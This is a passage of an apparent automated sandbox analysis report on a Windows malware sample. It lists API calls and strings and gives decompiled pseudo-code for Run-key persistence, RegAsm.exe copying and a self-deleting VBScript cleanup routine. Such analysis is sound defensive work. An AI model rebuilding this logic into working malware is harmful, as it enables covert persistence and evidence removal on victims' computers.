                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 00407E94
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407E9D
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407EC2
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ECB
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ED3
                                  • wcscmp.MSVCRT ref: 00407EE0
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 00407EF1
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407F1D
                                  • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000), ref: 00407F25
                                  • wcslen.MSVCRT ref: 00407F40
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00415A24,?), ref: 00407F65
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415A24,?), ref: 00407F72
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F7D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F86
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F8F
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407FAB
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407FB4
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407FBE
                                  • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000), ref: 00407FC6
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 00407FD3
                                    • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00407FE5
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000007), ref: 00408010
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 0040801D
                                  • wcslen.MSVCRT ref: 00408022
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000007), ref: 00408034
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 0040803B
                                  • _wgetenv.MSVCRT ref: 0040804B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00408056
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408061
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040806C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(WScript.Sleep 1000,?), ref: 0040807E
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject")), ref: 0040808C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,?,00415628,0041623C), ref: 004080B0
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ,?,00415628,00000000), ref: 004080C4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080CF
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004080DC
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080E9
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080F6
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408102
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040810B
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408114
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040811D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408126
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040812F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408138
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 0040814B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",?,0041BA28,00000000), ref: 00408163
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040816E
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040817B
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408188
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408194
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040819D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081A6
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081AF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081B8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081C1
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 004081CF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004081DB
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 004081E5
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004081F1
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 0040820F
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040821C
                                  • exit.MSVCRT ref: 00408228
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408231
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040823A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@$G@2@@0@Hstd@@V?$basic_string@$?c_str@?$basic_string@$V01@V10@$??0?$basic_string@G@1@@$V01@@$??4?$basic_string@$FileY?$basic_string@$V10@0@wcslen$AttributesCopy$?length@?$basic_string@CreateDirectoryExecuteShell_wgetenvexitwcscmp
                                  • String ID: """, 0$6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open
                                  • API String ID: 740851534-1710889521
                                  • Opcode ID: 25a4468c4bedb9d25f6c62a780da0af2a7d65bb534f9a9386c322f7da57d4325
                                  • Instruction ID: 2c5ee03a622c4f430e0af795343514bbf493609e2573cf328c1cc28c00924062
                                  • Opcode Fuzzy Hash: 25a4468c4bedb9d25f6c62a780da0af2a7d65bb534f9a9386c322f7da57d4325
                                  • Instruction Fuzzy Hash: 57C15D7290051DEBCB04AFE0EC49DEE7B3CFF54345B44802AF916A71A0EB789945CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 20%
                                  			E004085AC(char _a4) {
                                  				signed int _v5;
                                  				char _v6;
                                  				char _v24;
                                  				char _v40;
                                  				char _v56;
                                  				char _v72;
                                  				char _v88;
                                  				void* _v104;
                                  				void* _v120;
                                  				short _v640;
                                  				void* _t63;
                                  				char* _t65;
                                  				WCHAR* _t68;
                                  				char* _t69;
                                  				char* _t71;
                                  				char* _t74;
                                  				char* _t75;
                                  				char* _t76;
                                  				char* _t77;
                                  				signed int* _t79;
                                  				char* _t80;
                                  				char* _t81;
                                  				signed int _t82;
                                  				short* _t84;
                                  				char* _t85;
                                  				char* _t86;
                                  				WCHAR* _t88;
                                  				char* _t89;
                                  				char* _t90;
                                  				short* _t154;
                                  				void* _t161;
                                  				void* _t162;
                                  				void* _t164;
                                  				void* _t166;
                                  
                                  				_t63 = E0040AC8C();
                                  				if( *0x41b154 != 0x30) {
                                  					_t63 = E00406D41(0x41b900);
                                  				}
                                  				if( *0x41c118 == 1) {
                                  					_t63 = E0041050F(_t63);
                                  				}
                                  				if( *0x41b22a != 0) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t63 = E00412BEE(_t63);
                                  				}
                                  				_t94 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                                  				if( *0x41ba58 == 1) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t63 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t63);
                                  					_t161 = _t161 + 0xc;
                                  				}
                                  				if( *0x41bc64 == 1) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t63 = E0040B9E8(0x80000002, _t94, _t63);
                                  					_t161 = _t161 + 0xc;
                                  				}
                                  				if( *0x41ba20 == 1) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t63 = E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t63);
                                  					_t161 = _t161 + 0xc;
                                  				}
                                  				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t65 = E0040B692(0x80000001,  &_v640, "exepath",  &_v640, 0x208, _t63, _t63);
                                  				_t162 = _t161 + 0x1c;
                                  				if(_t65 == 0) {
                                  					_t65 = GetModuleFileNameW(0,  &_v640, 0x208);
                                  				}
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				RegDeleteKeyA(0x80000001, _t65);
                                  				_v5 = 1;
                                  				_t68 = SetFileAttributesW( &_v640, 0x80);
                                  				if(_t68 == 0) {
                                  					_v5 = _v5 & _t68;
                                  				}
                                  				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
                                  				if(_t68 != 0) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					SetFileAttributesW(_t68, 0x80);
                                  				}
                                  				_t69 =  &_v6;
                                  				__imp___wgetenv(L"Temp", _t69, L"\\update.vbs");
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t69);
                                  				L00414146();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v88, _t69);
                                  				_t71 =  &_v6;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t71);
                                  				L0041416A();
                                  				_t164 = _t162 + 0x18;
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v40, L"On Error Resume Next\n", _t71);
                                  				if(_v5 != 0) {
                                  					_t88 =  &_v640;
                                  					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t88,  &_v6, L"\")\n");
                                  					_t89 =  &_v72;
                                  					L0041416A();
                                  					_t90 =  &_v24;
                                  					L00414146();
                                  					_t164 = _t164 + 0x18;
                                  					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t90, _t90, _t89, _t89, L"while fso.FileExists(\"", _t88);
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				}
                                  				_t154 = L"\"\n";
                                  				_t74 =  &_v6;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t74,  &_v640, _t154);
                                  				_t75 =  &_v72;
                                  				L00414146();
                                  				_t76 =  &_v56;
                                  				L00414146();
                                  				_t166 = _t164 + 0x18;
                                  				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t76, _t76, _t75, _t75, _t74);
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				if(_v5 != 0) {
                                  					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
                                  				}
                                  				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
                                  				if(_t76 != 0) {
                                  					_t85 =  &_v72;
                                  					L0041416A();
                                  					_t86 =  &_v56;
                                  					L00414146();
                                  					_t166 = _t166 + 0x18;
                                  					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t86, _t86, _t85, _t85, L"fso.DeleteFolder \"", 0x41bc68, _t154);
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				}
                                  				_t77 =  &_v6;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"\"\"\", 0", _t77, "\n");
                                  				_t79 =  &_v5;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\"", _t79,  &_a4, _t77);
                                  				_t80 =  &_v24;
                                  				L0041414C();
                                  				_t81 =  &_v72;
                                  				L0041414C();
                                  				_t82 =  &_v56;
                                  				L00414146();
                                  				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t82, _t82, _t81, _t81, _t80, _t80, _t79);
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  				_t84 = E00412D56( &_v40, _t82 << 1, _t82 << 1, _t82, 0);
                                  				if(_t84 != 0) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t84 = ShellExecuteW(0, L"open", _t84, 0x415800, 0x415800, 0);
                                  					if(_t84 > 0x20) {
                                  						exit(0);
                                  					}
                                  				}
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				return _t84;
                                  			}
                                  0x004085b5
                                  0x004085c1
                                  0x004085c8
                                  0x004085c8
                                  0x004085d4
                                  0x004085d6
                                  0x004085d6
                                  0x004085e2
                                  0x004085e9
                                  0x004085f0
                                  0x004085f5
                                  0x00408605
                                  0x0040860f
                                  0x00408613
                                  0x0040861c
                                  0x00408621
                                  0x00408621
                                  0x0040862b
                                  0x0040862f
                                  0x0040863c
                                  0x00408641
                                  0x00408641
                                  0x0040864b
                                  0x0040864f
                                  0x00408660
                                  0x00408665
                                  0x00408665
                                  0x0040866f
                                  0x00408678
                                  0x00408698
                                  0x004086a0
                                  0x004086a5
                                  0x004086aa
                                  0x004086b6
                                  0x004086b6
                                  0x004086be
                                  0x004086c6
                                  0x004086df
                                  0x004086e3
                                  0x004086e7
                                  0x004086e9
                                  0x004086e9
                                  0x004086f7
                                  0x00408701
                                  0x00408709
                                  0x00408710
                                  0x00408710
                                  0x00408712
                                  0x00408720
                                  0x0040872b
                                  0x00408736
                                  0x00408741
                                  0x00408747
                                  0x00408753
                                  0x00408763
                                  0x00408768
                                  0x0040876e
                                  0x00408778
                                  0x00408783
                                  0x0040878d
                                  0x00408794
                                  0x0040879d
                                  0x004087a6
                                  0x004087aa
                                  0x004087af
                                  0x004087b6
                                  0x004087bf
                                  0x004087c8
                                  0x004087d1
                                  0x004087d1
                                  0x004087d7
                                  0x004087e4
                                  0x004087f0
                                  0x004087f7
                                  0x004087fb
                                  0x00408804
                                  0x00408808
                                  0x0040880d
                                  0x00408814
                                  0x0040881d
                                  0x00408826
                                  0x0040882f
                                  0x00408839
                                  0x00408843
                                  0x00408843
                                  0x00408850
                                  0x0040885a
                                  0x0040885e
                                  0x00408867
                                  0x00408870
                                  0x00408874
                                  0x00408879
                                  0x00408880
                                  0x00408889
                                  0x00408892
                                  0x00408892
                                  0x00408898
                                  0x004088a9
                                  0x004088b4
                                  0x004088c0
                                  0x004088c7
                                  0x004088cb
                                  0x004088d4
                                  0x004088d8
                                  0x004088e1
                                  0x004088e5
                                  0x004088f1
                                  0x004088fa
                                  0x00408903
                                  0x0040890c
                                  0x00408915
                                  0x0040891e
                                  0x0040892c
                                  0x00408938
                                  0x00408942
                                  0x0040894e
                                  0x00408955
                                  0x0040895f
                                  0x00408967
                                  0x00408974
                                  0x0040897d
                                  0x00408980
                                  0x00408980
                                  0x0040897d
                                  0x00408989
                                  0x00408992
                                  0x0040899b
                                  0x004089a5

                                  APIs
                                    • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                    • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004085E9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 00408613
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040862F
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040864F
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040866F
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00408678
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 00408698
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 004086B6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004086BE
                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 004086C6
                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 004086E3
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 004086F7
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 00408709
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 00408710
                                    • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000528A,00000000,00000004,0041B310,004085CD), ref: 00406D56
                                    • Part of subcall function 00406D41: UnhookWindowsHookEx.USER32(00000000), ref: 00406D5F
                                    • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000526A,00000000), ref: 00406D6F
                                  • _wgetenv.MSVCRT ref: 00408720
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040872B
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408736
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408741
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject"),?), ref: 00408753
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,On Error Resume Next,00000000), ref: 00408763
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040876E
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,")), ref: 0040878D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,while fso.FileExists(",00000000), ref: 0040879D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004087AA
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004087B6
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087BF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087C8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087D1
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ",?,?,00416354), ref: 004087F0
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004087FB
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408808
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408814
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040881D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408826
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040882F
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(wend), ref: 00408843
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408850
